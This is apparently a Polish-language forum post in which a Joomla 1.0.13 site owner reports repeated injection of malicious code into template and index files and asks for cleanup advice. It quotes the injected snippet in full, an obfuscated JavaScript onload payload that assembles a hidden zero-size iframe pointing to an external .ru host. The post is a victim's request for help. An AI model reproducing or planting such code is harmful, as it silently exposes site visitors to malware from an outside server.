Witam. Mój serwis został zaatakowany i dopisano mi złośliwy kod do pliku 404.php w katalogu template. Nie spotkałem się jeszcze z takim kodem na forum, więc postanowiłem założyć nowy temat.
Dopisany kod wygląda następująco:
{
?><html><body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);
"></body></html><??>

Po tym zdarzeniu przywróciłem stronę z kopii i pozostawiłem. Na następny dzień znowu dopisano ten sam kod ale tym razem do pliku index.php w katalogu głównym.

Mam joomla 1.0.13 PL ze strony centrum, poza standardowymi dodatkami mam jeszcze: com_expose, com_swmenufree4[1].6, pack_artbannersplus_1[1].5.1-pl-iso, mod_flashmod_v2.0, mod_vcnt_ohne_c, bot_plugin_jw_allvideos_2[1].4-pl, bot_multithumb20b1_3_pl.
Wszystkie zmienne PHP ustawione są tak jak sobie tego życzy joomla.
Bardzo dziwne jest to, że zarówno plik 404.php jak i index.php miały chmody na 444. Zatem czy nadpisanie mogło nastąpić przez dziurę w jakimś dodatku? Ja myślę, że nie i atak następuje przez ftp (ktoś, lub coś wyśledził hasło).
Proszę o pomoc i wskazówki, jak naprawić skutecznie stronę i czy moje przypuszczenie jest słószne.
Dodatkowo interesuje mnie czy wirus może być zagnieżdżony w bazie danych, jeśli tak to jak go wyśledzić i usunąć.
Mam też log ze statystyk (500 ostatnich wejść na stronę kiedy w międzyczasie nastąpił atak)

Pozdrawiam i dziękuję za wszelką pomoc.